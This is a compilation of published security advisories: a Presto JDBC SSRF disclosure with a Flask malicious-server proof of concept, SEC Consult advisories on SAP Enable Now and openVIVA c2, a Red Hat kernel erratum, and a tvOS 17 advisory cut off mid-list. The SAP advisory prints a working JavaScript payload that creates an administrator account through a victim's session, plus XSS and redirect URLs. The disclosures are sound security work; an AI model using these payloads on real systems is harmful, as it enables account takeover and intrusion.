### Summary

Presto JDBC is vulnerable to Server-Side Request Forgery (SSRF) when connecting a remote Presto server. An attacker can modify the nextUri parameter to internal server in response content that Presto JDBC client will request next and view sensitive information from highly sensitive internal servers or perform a local port scan. 

### Details

The Presto protocol has a nextUri parameter that specifies which URI the client will request next to obtain more query data. Presto JDBC will directly use the nextUri returned by the remote Presto server as the URL for the next request. So if a malicious server modify the nextUri parameter to the internal server, JDBC will request it and cause SSRF.

For unexpected responses, JDBC will put the response body into the error. So the response of the internal server will be leaked if the server also returns the error directly to the user.

The relevant code is in file path `/presto-client/src/main/java/com/facebook/presto/client/StatementClientV1.java` and function `advance` .

The flowchart is as follows:

<img src="https://s2.loli.net/2023/09/18/gvUZ2rT7w3Okbde.png" alt="presto_jdbc_ssrf_2.png" style="zoom:50%;" />

### PoC

Running an HTTP service to route POST /v1/statement redirect to the intranet. For example, using these Python code:

```python
from flask import Flask, Response

app = Flask(__name__)

@app.route('/v1/statement', methods=['POST'])
def next_uri_to_interal_server():
    data = '{"id":"test_id","infoUri":"whatever","nextUri":"http://127.0.0.1:8888","stats":{"state":"QUEUED","queued":true,"scheduled":false,"nodes":0,"totalSplits":0,"queuedSplits":0,"runningSplits":0,"completedSplits":0,"cpuTimeMillis":0,"wallTimeMillis":0,"queuedTimeMillis":0,"elapsedTimeMillis":0,"processedRows":0,"processedBytes":0,"peakMemoryBytes":0,"peakTotalMemoryBytes":0,"peakTaskTotalMemoryBytes":0,"spilledBytes":0},"warnings":[]}'
    return Response(data, content_type='application/json; charset=utf-8', status=200)

if __name__ == '__main__':
    app.run(host="0.0.0.0",port=8000)
```

Connecting to the malicious server using JDBC:

```java
String url = "jdbc:presto://<ip>:<port>";
Properties properties = new Properties();
properties.setProperty("user", "root");
try {
    Connection connection = DriverManager.getConnection(url, properties);
    Statement stmt = connection.createStatement();
    ResultSet res = stmt.executeQuery("show catalogs");
    while(res.next()) {
        System.out.println(res.getString(1));
    }
} catch (Exception e) {
    e.printStackTrace();
}
```

Pwned!

### Impact

When the target remote Presto server to be connected is controllable,  an attacker can view sensitive information from highly sensitive internal servers or perform a local port scan. 

Vulnerability Discovery Credit: Jianyu Li @ WuHeng Lab of ByteDance

**Summary**

Presto JDBC is vulnerable to Server-Side Request Forgery (SSRF) when connecting a remote Presto server. An attacker can modify the nextUri parameter to internal server in response content that Presto JDBC client will request next and view sensitive information from highly sensitive internal servers or perform a local port scan.

**Details**

The Presto protocol has a nextUri parameter that specifies which URI the client will request next to obtain more query data. Presto JDBC will directly use the nextUri returned by the remote Presto server as the URL for the next request. So if a malicious server modify the nextUri parameter to the internal server, JDBC will request it and cause SSRF.

For unexpected responses, JDBC will put the response body into the error. So the response of the internal server will be leaked if the server also returns the error directly to the user.

The relevant code is in file path /presto-client/src/main/java/com/facebook/presto/client/StatementClientV1.java and function advance .

The flowchart is as follows:

**PoC**

Running an HTTP service to route POST /v1/statement redirect to the intranet. For example, using these Python code:

from flask import Flask, Response

app \= Flask(\_\_name\_\_)

@app.route('/v1/statement', methods\=\['POST'\])
def next\_uri\_to\_interal\_server():
    data \= '{"id":"test\_id","infoUri":"whatever","nextUri":"http://127.0.0.1:8888","stats":{"state":"QUEUED","queued":true,"scheduled":false,"nodes":0,"totalSplits":0,"queuedSplits":0,"runningSplits":0,"completedSplits":0,"cpuTimeMillis":0,"wallTimeMillis":0,"queuedTimeMillis":0,"elapsedTimeMillis":0,"processedRows":0,"processedBytes":0,"peakMemoryBytes":0,"peakTotalMemoryBytes":0,"peakTaskTotalMemoryBytes":0,"spilledBytes":0},"warnings":\[\]}'
    return Response(data, content\_type\='application/json; charset=utf-8', status\=200)

if \_\_name\_\_ \== '\_\_main\_\_':
    app.run(host\="0.0.0.0",port\=8000)

Connecting to the malicious server using JDBC:

String url = "jdbc:presto://<ip>:<port>";
Properties properties = new Properties();
properties.setProperty("user", "root");
try {
    Connection connection = DriverManager.getConnection(url, properties);
    Statement stmt = connection.createStatement();
    ResultSet res = stmt.executeQuery("show catalogs");
    while(res.next()) {
        System.out.println(res.getString(1));
    }
} catch (Exception e) {
    e.printStackTrace();
}

Pwned!

**Impact**

When the target remote Presto server to be connected is controllable, an attacker can view sensitive information from highly sensitive internal servers or perform a local port scan.

Vulnerability Discovery Credit: Jianyu Li @ WuHeng Lab of ByteDance

**References**

*   GHSA-86q5-qcjc-7pv4

GHSA-86q5-qcjc-7pv4: Presto JDBC Server-Side Request Forgery by nextUri

SAP Enable Now Manager version 10.6.5 Build 2804 Cloud Edition suffers from cross site request forgery, cross site scripting, and open redirection vulnerabilities.

    SEC Consult Vulnerability Lab Security Advisory < 20230927-0 >=======================================================================               title: Multiple Vulnerabilities             product: SAP® Enable Now Manager  vulnerable version: 10.6.5 (Build 2804) Cloud Edition       fixed version: May 2023 Release          CVE number: N/A (cloud)              impact: high            homepage: https://www.sap.com/about.html               found: 2022-10-21                  by: Paul Serban (Eviden)                      Fabian Hagg (Office Vienna)                      SEC Consult Vulnerability Lab                      An integrated part of SEC Consult, an Eviden business                      Europe | Asia                      https://www.sec-consult.com=======================================================================Vendor description:-------------------"SAP Enable Now solution provides advanced in-application help andtraining capabilities helping you to improve productivity and useradoption, as well as to increase satisfaction of the end-user experience.Create, maintain, and deliver in-application help, learning materials,and documentation content easily."Source: https://www.sapstore.com/solutions/41243/SAP-Enable-NowBusiness recommendation:------------------------Due to the Cloud Edition being affected, the vendor automatically pusheda fix in the production environment in the May 2023 Release.SEC Consult recommends to perform a thorough security review conducted bysecurity professionals to identify and resolve potential further criticalsecurity issues.Vulnerability overview/description:-----------------------------------Multiple vulnerabilities were identified that could be chained together inorder to allow a remote, unauthenticated attacker to create new administrativeuser accounts by tricking the victim to click on a malicious link or visita malicious website prepared by the attacker.1) Open Redirect/URL Redirection VulnerabilityThe file download feature of the application contains an unvalidatedparameter value that exposes it to an open redirect vulnerability. Anattacker can create a malicious URL which would redirect the victim toa malicious site, for example, a phishing site convincing the victimto login once again.2) Reflected Cross Site Scripting (XSS)A reflected XSS vulnerability was found affecting the same parameter asused in 1). Due to insufficient input validation and output encoding, anattacker can inject arbitrary HTML or JavaScript code into the generatedserver response, executing it in the browser of the victim. The vulnerability,can be exploited, for example, to create new administrative user accountsin the application, thereby fully compromising the application. Any CSRFprotection can be bypassed by means of this vulnerability.3) Insufficient Cross-Site Request Forgery (CSRF) ProtectionNo implementation of CSRF protection was detected in the application.Using this vulnerability, an attacker can issue requests in the contextof administrative user sessions. This includes critical state changingactions such as user creation or role assignment. Note that in thetest environment the option 'Supported Functions' was set to value'DISABLE-CSRF-PROTECTION' in the server settings feature of the application.Certain configurations require this setting to be enabled, e.g. to allowthe SEN Workflow Approver extension to submit the data on behalf of thelogged-in user to the SAP Enable Now Manager. Without this parameter,the extension will only be able to read the content and workflow information)This indicates that there is an insecure feature which allows the protectionmechanism to be disabled globally. It could not be clarified if this is thedefault setting. In any case, the function should still be enhanced to protectcritical actions such as functions used in user management or role/permissionmanagement even if the mechanism is disabled by configuration.Proof of concept:-----------------1) Open Redirect/URL Redirection VulnerabilityThe public endpoint /resources/open_file.html is vulnerable to anopen redirect via GET parameter 'info'. To verify this vulnerability,it is sufficient to open the following URL in a web browser.https://example.enable-now.cloud.sap/resources/open_file.html?info=https://www.sec-consult.comAfter browsing to the above link, the victim gets redirected towww.sec-consult.com in a new browser window opened by the embeddedcall of function window.open(). Note that both attacker and victimdo not have to be authenticated for successful exploitation.2) Reflected Cross-Site Scripting (XSS)The public endpoint /resources/open_file.html is affected by an XSSvulnerability in GET parameter 'info'. To verify this vulnerability,it is sufficient to open the following URL in a web browser.https://example.enable-now.cloud.sap/resources/open_file.html?info=javascript:alert(document.domain)After browsing to the above link, the domain property returns thedomain name of the server it was loaded from an alert window withinthe browser of the victim. This proves the successful execution of theinjected JavaScript code. In fact, any kind of JavaScript code couldbe injected by the attacker. Note that both attacker and victim donot have to be authenticated for successful exploitation.3) Insufficient Cross-Site Request Forgery (CSRF) ProtectionNo CSRF protection can be observed in POST requests sent between theclient and server. This includes at least the functions "task creation","user creation", "permission assignment" and "role/group assignment". Notethat this vulnerability appears to only affect systems where the CSRF protectionis disabled by option 'Supported Functions' set to value 'DISABLE-CSRF-PROTECTION'in the server settings. Although this setting can be reverted, it is advisedto have the protection enabled for critical operations such as user creationor permission assignment at any time (also when the option is set).Several of the vulnerabilities above can be chained together by anunauthenticated attacker. Considering the types of vulnerabilities,there are multiple exploitation scenarios. In our example we willcreate a link that, when clicked by an administrator victim, willcreate a new admin account. For this attack to work, we first needto gather some information. To create an account, we need to know twoimportant values: the OU and the UID. The OU represents the OrganizationalUnit unique identifier. The UID here represents the unique Group IDof our target group where we want our new user to be added. Performinga simple GET request to endpoint /self/group, both values can beobtained. The following listing shows the server response.------------------------------------------------------------------------------------------------HTTP/1.1 200Cache-Control: no-cache, no-store, must-revalidateExpires: 0Vary: OriginSet-Cookie: JSESSIONID=DD67AF<snip>ADF784; Path=/; Secure; HttpOnly;Content-Type: text/json;charset=UTF-8Server: SAPConnection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadContent-Length: 396{"response":{"group":[{"name":"Learners","uid":"G_1C67681<snip>60E0938C4CB086","ou":"OU_E8BC20E2<snip>8034410C", "active":true},{"name":"Master Authors","uid":"G_72568DE0<snip>85DE0845","ou":"OU_E8BC20E2<snip>8034410C ","active":true},{"name":"Administrators","uid":"G_3B5DBB<snip>A97DE47C4EDF","ou":"OU_E8BC20E2<snip>80344 <-- UID of admin group and OU10C ","active":true}]}}------------------------------------------------------------------------------------------------Finally, in order for the attack to succeed, the attacker needsthe victim (logged in as administrator) to do first a request onthe above endpoint, then a POST request on the endpoint /!/userto actually create the new user account with the administratorrole assigned using the values taken from the previous response.These interactions can be scripted using the following ten linesof JavaScript code.------------------------------------------------------------------------------------------------var req1 = new XMLHttpRequest();req1.open('GET', "https://example.enable-now.cloud.sap/self/group",false);req1.withCredentials = true;req1.send();var obj = JSON.parse(req1.responseText).response;for (var i = 0; i< obj.group.length ;i++) {if (obj.group[i].name === 'Administrators') {var uid = obj.group[i].uid;var ou = obj.group[i].ou}};var req2 = new XMLHttpRequest();req2.open('POST',"https://example.enable-now.cloud.sap/!/user",false);req2.withCredentials = true;req2.send(JSON.stringify({"user":{"auth_user":"sapmatt","firstname":"SEC","lastname":"Consult","email":"","passwd":"sappass","role":[uid],"ou":ou}}));------------------------------------------------------------------------------------------------We can base64-encode this payload and pass it to the Javascript eval(atob())function using the XSS vulnerability in the file download feature (seen in 2.).The link could then be shortened to enhance the likelihood of successfulexploitation. This can be achieved, for example, by leveraging the Open Redirectvulnerability (seen in 1.) to redirect the victim to an attacker-controlledwebsite and trigger the above payload, making it an attack more likely tosucceed. If the victim is logged into the application and is part ofthe Administrator group, when they click on this link, a new adminaccount will be instantly created. The attacker then can log in and hasfull control over the application.Vulnerable / tested versions:-----------------------------The following versions of the software were found to be vulnerable during our tests:- SAP Enable Now Manager Version: 10.6.5 (Build 2804) - Cloud Edition (~October 2022)Vendor contact timeline:------------------------2022-11-08: Contacting vendor via secure@sap.com2022-11-10: Vendor requested screenshots and steps to reproduce2022-11-10: Informed vendor the previously provided POC contains the steps to reproduce             and screenshots weren't available at that time2022-11-10: Vendor confirmed issues are under review2022-11-18: Contacted vendor to request an update2022-11-18: Vendor confirmed issues are still under review2022-12-01: Vendor reached back to confirm a Security Incident ticket was opened to             the Engineering Team2023-02-02: Contacted vendor to request an update2023-02-03: Vendor confirmed that engineering had fixes ready and waiting on a             release schedule.2023-02-07: Vendor confirmed fix was deployed to production for ticket no #22801965642023-04-14: Contacted vendor to request update on ticket no #2280196563 fix2023-04-17: Vendor mentioned that the fix is scheduled to be deployed in May release2023-05-08: Vendor confirmed fix was deployed to production for 22801965632023-09-27: Public release of security advisory.Solution:---------Due to the Cloud Edition being affected, the vendor automatically pusheda fix in the production environment in the May 2023 Release.Workaround:-----------NoneAdvisory URL:-------------https://sec-consult.com/vulnerability-lab/~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~SEC Consult Vulnerability LabAn integrated part of SEC Consult, an Eviden businessEurope | AsiaAbout SEC Consult Vulnerability LabThe SEC Consult Vulnerability Lab is an integrated part of SEC Consult, anEviden business. It ensures the continued knowledge gain of SEC Consult in thefield of network and application security to stay ahead of the attacker. TheSEC Consult Vulnerability Lab supports high-quality penetration testing andthe evaluation of new offensive and defensive technologies for our customers.Hence our customers obtain the most current information about vulnerabilitiesand valid recommendation about the risk profile of new technologies.~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~Interested to work with the experts of SEC Consult?Send us your application https://sec-consult.com/career/Interested in improving your cyber security with the experts of SEC Consult?Contact our local offices https://sec-consult.com/contact/~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~Mail: security-research at sec-consult dot comWeb: https://www.sec-consult.comBlog: https://blog.sec-consult.comTwitter: https://twitter.com/sec_consultEOF P. Serban, F. Hagg / @2023

SAP Enable Now Manager 10.6.5 Build 2804 Cloud Edition CSRF / XSS / Redirect

openVIVA c2 suffers from a persistent cross site scripting vulnerability. Versions prior to 20220801 are affected.

SEC Consult Vulnerability Lab Security Advisory < 20230925-0 >  
=======================================================================  
               title: Stored Cross-Site Scripting  
             product: mb Support broker management solution openVIVA c2  
  vulnerable version: <20220801  
       fixed version: =>20220801  
          CVE number: CVE-2022-39172  
              impact: Medium  
            homepage: https://mbsupport.de  
               found: 2022-03-16  
                  by: Daniel Hirschberger (Office Bochum)  
                      SEC Consult Vulnerability Lab

                      An integrated part of SEC Consult, an Eviden business  
                      Europe | Asia

                      https://www.sec-consult.com  
=======================================================================

Vendor description:  
-------------------  
"Support small and medium-sized companies as well as large corporate customers  
with just one software. Sales , inventory management , billing , e-mail and  
much more - with openVIVA c2 you get everything in one application. Without  
system disruption and in one database, you can do all the work of an insurance  
broker with one piece of software.

Connect brokers, intermediaries, insurers and customers directly with our  
self-service portals . Strengthen your customer relationships and work more  
efficiently yourself.

mb Support offers portals for intermediaries as well as industrial and  
commercial customers and tailor-made portal solutions for insurers, brokers and  
private customers."

Source: https://mbsupport.de/

Business recommendation:  
------------------------  
The vendor provides an updated version to their customers.

An in-depth security analysis performed by security professionals is  
highly advised, as the software may be affected from other security issues.

Vulnerability overview/description:  
-----------------------------------  
1) Stored Cross-Site Scripting (CVE-2022-39172)  
An authenticated attacker with privileges of the role 'user' can create a new  
'Vorgang' (Process). The field 'Name' is not sanitized and enables an attacker  
to perform a stored XSS attack. Additionally, the field 'Hauptverantwortlicher'  
(persons mainly responsible) can be used to assign this 'Vorgang' to another user  
who will receive it in his overview list. This results in a targeted stored  
XSS attack.

Proof of concept:  
-----------------  
1) Stored Cross-Site Scripting (CVE-2022-39172)  
The application is developed on top of Oracle Apex  
(https://apex.oracle.com/en/) which provides several security features to  
developers. Two of those are request replay protection and parameter  
checksumming which make it hard to develop a PoC which only consists of  
requests and responses. Therefore this PoC will be a textual description of the  
required steps and supplemented with pictures. Additionally the library  
'AlertifyJS' is used, which changes the appearance of alert popups which  
can be confusing if you are used to the standard alert popups.

To execute the attack the following steps have to be performed:  
1. Log in to openVIVA c2  
2. Go to 'mein openVIVA' (my openVIVA)  
3. Click on 'Vorgangszuordnung' (Process Assignment)  
4. Click on 'Neuen Vorgang starten' (Start new Process)  
5. In the new form enter the XSS payload into the 'Name' field, for example  
    "<script>alert('XSS')</script>"  
6. Choose your victim as 'Hauptverantwortlicher' (persons mainly responsible)  
7. Click on the three dots  
8. Click on 'Speichern' (save)

The victim now has a new 'Vorgang' in his inbox. If the 'Vorgänge' menu is clicked,  
the victim is redirected to the list of assigned 'Vorgänge'. Because our payload  
is in the name field it is executed as soon as the list of processes is loaded.

Vulnerable / tested versions:  
-----------------------------  
The following version has been tested and found to be vulnerable:  
* openVIVA c2 20220101

Vendor contact timeline:  
------------------------  
2022-03-30: Contacting vendor through email followed by a telephone call,  
             sent the advisory  
2022-04-20: Asking for status update  
2022-04-22: Patch release is planned for August  
2022-07-26: Statuscall: Patch exists, advisory release delayed until  
             rollout to all customers is complete (~ August 2023(!))  
2023-09-18: Asking for a status update and patch download information.  
             Vendor response: no public link available; few customers  
             still have no patch.  
2023-09-25: Release of security advisory

Solution:  
---------  
Upgrade to version 2022-08-01 or later. The vendor has no public  
download link available as all customers will be patched according  
to their maintenance contract.

Workaround:  
-----------  
None

Advisory URL:  
-------------  
https://sec-consult.com/vulnerability-lab/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SEC Consult Vulnerability Lab  
An integrated part of SEC Consult, an Eviden business  
Europe | Asia

About SEC Consult Vulnerability Lab  
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an  
Eviden business. It ensures the continued knowledge gain of SEC Consult in the  
field of network and application security to stay ahead of the attacker. The  
SEC Consult Vulnerability Lab supports high-quality penetration testing and  
the evaluation of new offensive and defensive technologies for our customers.  
Hence our customers obtain the most current information about vulnerabilities  
and valid recommendation about the risk profile of new technologies.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
Interested to work with the experts of SEC Consult? Send us your application  
https://sec-consult.com/career/

Interested in improving your cyber security with the experts of SEC Consult?  
Contact our local offices https://sec-consult.com/contact/  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Mail: security-research at sec-consult dot com  
Web: https://www.sec-consult.com  
Blog: https://blog.sec-consult.com  
Twitter: https://twitter.com/sec_consult

EOF Daniel Hirschberger / @2023

openVIVA c2 20220101 Cross Site Scripting

Red Hat Security Advisory 2023-5414-01 - An update for kernel is now available for Red Hat Enterprise Linux 7.6 Advanced Update Support. Red Hat Product Security has rated this update as having a security impact of Important.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: kernel security update  
Advisory ID:       RHSA-2023:5414-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:5414  
Issue date:        2023-10-03  
CVE Names:         CVE-2023-35001   
=====================================================================

1. Summary:

An update for kernel is now available for Red Hat Enterprise Linux 7.6  
Advanced Update Support.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux Server AUS (v. 7.6) - noarch, x86_64  
Red Hat Enterprise Linux Server Optional AUS (v. 7.6) - x86_64

3. Description:

The kernel packages contain the Linux kernel, the core of any Linux  
operating system.

Security Fix(es):

* kernel: nf_tables: stack-out-of-bounds-read in nft_byteorder_eval()  
(CVE-2023-35001)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

The system must be rebooted for this update to take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2220892 - CVE-2023-35001 kernel: nf_tables: stack-out-of-bounds-read in nft_byteorder_eval()

6. Package List:

Red Hat Enterprise Linux Server AUS (v. 7.6):

Source:  
kernel-3.10.0-957.106.1.el7.src.rpm

noarch:  
kernel-abi-whitelists-3.10.0-957.106.1.el7.noarch.rpm  
kernel-doc-3.10.0-957.106.1.el7.noarch.rpm

x86_64:  
bpftool-3.10.0-957.106.1.el7.x86_64.rpm  
kernel-3.10.0-957.106.1.el7.x86_64.rpm  
kernel-debug-3.10.0-957.106.1.el7.x86_64.rpm  
kernel-debug-debuginfo-3.10.0-957.106.1.el7.x86_64.rpm  
kernel-debug-devel-3.10.0-957.106.1.el7.x86_64.rpm  
kernel-debuginfo-3.10.0-957.106.1.el7.x86_64.rpm  
kernel-debuginfo-common-x86_64-3.10.0-957.106.1.el7.x86_64.rpm  
kernel-devel-3.10.0-957.106.1.el7.x86_64.rpm  
kernel-headers-3.10.0-957.106.1.el7.x86_64.rpm  
kernel-tools-3.10.0-957.106.1.el7.x86_64.rpm  
kernel-tools-debuginfo-3.10.0-957.106.1.el7.x86_64.rpm  
kernel-tools-libs-3.10.0-957.106.1.el7.x86_64.rpm  
perf-3.10.0-957.106.1.el7.x86_64.rpm  
perf-debuginfo-3.10.0-957.106.1.el7.x86_64.rpm  
python-perf-3.10.0-957.106.1.el7.x86_64.rpm  
python-perf-debuginfo-3.10.0-957.106.1.el7.x86_64.rpm

Red Hat Enterprise Linux Server Optional AUS (v. 7.6):

x86_64:  
kernel-debug-debuginfo-3.10.0-957.106.1.el7.x86_64.rpm  
kernel-debuginfo-3.10.0-957.106.1.el7.x86_64.rpm  
kernel-debuginfo-common-x86_64-3.10.0-957.106.1.el7.x86_64.rpm  
kernel-tools-debuginfo-3.10.0-957.106.1.el7.x86_64.rpm  
kernel-tools-libs-devel-3.10.0-957.106.1.el7.x86_64.rpm  
perf-debuginfo-3.10.0-957.106.1.el7.x86_64.rpm  
python-perf-debuginfo-3.10.0-957.106.1.el7.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-35001  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIcBAEBCAAGBQJlG95OAAoJENzjgjWX9erEbO0P/1wGpgGyf1RzUxZZLxppiesh  
L71Kv9bSG1StT4tc339gCfcFvZgUR7JlT25dCgfQ6M84JSVDuRY8/v1J3tT7sccu  
RuQf78cq9o+dV0OgpqdLwtCDatyVN7DhISdyvXPBzJSN+F52Ocv43lKpNR19KXOc  
7P7PqL9ZZ5zC0ehKxyT3m/Tw09ZAOyOSlAhAm+t6J8STLvXAbxK079iJ1d4rt626  
mWxUwJIV0WnEzRrWnJN24k9zQGNBMocgDZloUvhtGbKeZz4AUNrZhdLIlzXnSdhL  
qTaBx5oPVAu3k3aNNHD8cqTAULlQS5sE/QD9yfNMZHo0q0sAkSHUIAQH57qy2WBf  
qoQlzlNPc+XmD/NvzK0qiFjy/K7r+RQDAsq56EiXGE7c0A9cZyn1zpow0Zl/8xfj  
KSKUbHU1Kn9yya5UsMNRpgWEqPzRirwc3/5cw+CyZQPOSaNUGNvjG0QDmpkPyqZ/  
VthlVll0spmySFt2YidyOumWRNZQZDXA1oJiCOk031MA0iGNd9+MiHRhS6gdr4WP  
kJ+AYIvIrlRRPzQfbmfYUAHgLhNaiZOyNzOOGGT18dfN2f9hpBFp47Ww286b87bN  
uVRDkGLHco2jznpTyzyAdyE07QhMecdth9vcKJ9jvLK7txaIbTdEEoAPLm6QgoTt  
QtoSyBg6nZSu18Expi0s  
=PoLy  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-5414-01

Apple Security Advisory 09-26-2023-9 - tvOS 17 addresses bypass, code execution, out of bounds read, and use-after-free vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

APPLE-SA-09-26-2023-9 tvOS 17

tvOS 17 addresses the following issues.  
Information about the security content is also available at  
https://support.apple.com/kb/HT213936.

Apple maintains a Security Updates page at  
https://support.apple.com/HT201222 which lists recent  
software updates with security advisories.

Airport  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: An app may be able to read sensitive location information  
Description: A permissions issue was addressed with improved redaction  
of sensitive information.  
CVE-2023-40384: Adam M.

App Store  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: A remote attacker may be able to break out of Web Content  
sandbox  
Description: The issue was addressed with improved handling of  
protocols.  
CVE-2023-40448: w0wbox

Apple Neural Engine  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: An app may be able to execute arbitrary code with kernel  
privileges  
Description: The issue was addressed with improved memory handling.  
CVE-2023-40432: Mohamed GHANNAM (@_simo36)  
CVE-2023-41174: Mohamed GHANNAM (@_simo36)  
CVE-2023-40409: Ye Zhang (@VAR10CK) of Baidu Security  
CVE-2023-40412: Mohamed GHANNAM (@_simo36)

Apple Neural Engine  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: An app may be able to execute arbitrary code with kernel  
privileges  
Description: A use-after-free issue was addressed with improved memory  
management.  
CVE-2023-41071: Mohamed GHANNAM (@_simo36)

Apple Neural Engine  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: An app may be able to disclose kernel memory  
Description: The issue was addressed with improved memory handling.  
CVE-2023-40399: Mohamed GHANNAM (@_simo36)

Apple Neural Engine  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: An app may be able to disclose kernel memory  
Description: An out-of-bounds read was addressed with improved input  
validation.  
CVE-2023-40410: Tim Michaud (@TimGMichaud) of Moveworks.ai

AuthKit  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: An app may be able to access user-sensitive data  
Description: The issue was addressed with improved handling of caches.  
CVE-2023-32361: Csaba Fitzl (@theevilbit) of Offensive Security

Bluetooth  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: An attacker in physical proximity can cause a limited out of  
bounds write  
Description: The issue was addressed with improved checks.  
CVE-2023-35984: zer0k

bootp  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: An app may be able to read sensitive location information  
Description: A privacy issue was addressed with improved private data  
redaction for log entries.  
CVE-2023-41065: Adam M., and Noah Roskin-Frazee and Professor Jason Lau  
(ZeroClicks.ai Lab)

CFNetwork  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: An app may fail to enforce App Transport Security  
Description: The issue was addressed with improved handling of  
protocols.  
CVE-2023-38596: Will Brattain at Trail of Bits

CoreAnimation  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: Processing web content may lead to a denial-of-service  
Description: The issue was addressed with improved memory handling.  
CVE-2023-40420: 이준성(Junsung Lee) of Cross Republic

Dev Tools  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: An app may be able to gain elevated privileges  
Description: This issue was addressed with improved checks.  
CVE-2023-32396: Mickey Jin (@patch1t)

Game Center  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: An app may be able to access contacts  
Description: The issue was addressed with improved handling of caches.  
CVE-2023-40395: Csaba Fitzl (@theevilbit) of Offensive Security

GPU Drivers  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: An app may be able to disclose kernel memory  
Description: The issue was addressed with improved memory handling.  
CVE-2023-40391: Antonio Zekic (@antoniozekic) of Dataflow Security

Kernel  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: An attacker that has already achieved kernel code execution may  
be able to bypass kernel memory mitigations  
Description: The issue was addressed with improved memory handling.  
CVE-2023-41981: Linus Henze of Pinauten GmbH (pinauten.de)

Kernel  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: An app may be able to execute arbitrary code with kernel  
privileges  
Description: The issue was addressed with improved memory handling.  
CVE-2023-41984: Pan ZhenPeng (@Peterpan0927) of STAR Labs SG Pte. Ltd.

Kernel  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: An app may be able to access sensitive user data  
Description: A permissions issue was addressed with improved validation.  
CVE-2023-40429: Michael (Biscuit) Thomas and 张师傅(@京东蓝军)

libpcap  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: A remote user may cause an unexpected app termination or  
arbitrary code execution  
Description: This issue was addressed with improved checks.  
CVE-2023-40400: Sei K.

libxpc  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: An app may be able to delete files for which it does not have  
permission  
Description: A permissions issue was addressed with additional  
restrictions.  
CVE-2023-40454: Zhipeng Huo (@R3dF09) of Tencent Security Xuanwu Lab  
(xlab.tencent.com)

libxpc  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: An app may be able to access protected user data  
Description: An authorization issue was addressed with improved state  
management.  
CVE-2023-41073: Zhipeng Huo (@R3dF09) of Tencent Security Xuanwu Lab  
(xlab.tencent.com)

libxslt  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: Processing web content may disclose sensitive information  
Description: The issue was addressed with improved memory handling.  
CVE-2023-40403: Dohyun Lee (@l33d0hyun) of PK Security

Maps  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: An app may be able to read sensitive location information  
Description: The issue was addressed with improved handling of caches.  
CVE-2023-40427: Adam M., and Wojciech Regula of SecuRing  
(wojciechregula.blog)

MobileStorageMounter  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: A user may be able to elevate privileges  
Description: An access issue was addressed with improved access  
restrictions.  
CVE-2023-41068: Mickey Jin (@patch1t)

Photos Storage  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: An app may be able to access edited photos saved to a temporary  
directory  
Description: The issue was addressed with improved checks.  
CVE-2023-40456: Kirin (@Pwnrin)  
CVE-2023-40520: Kirin (@Pwnrin)

Pro Res  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: An app may be able to execute arbitrary code with kernel  
privileges  
Description: The issue was addressed with improved memory handling.  
CVE-2023-41063: Certik Skyfall Team

Sandbox  
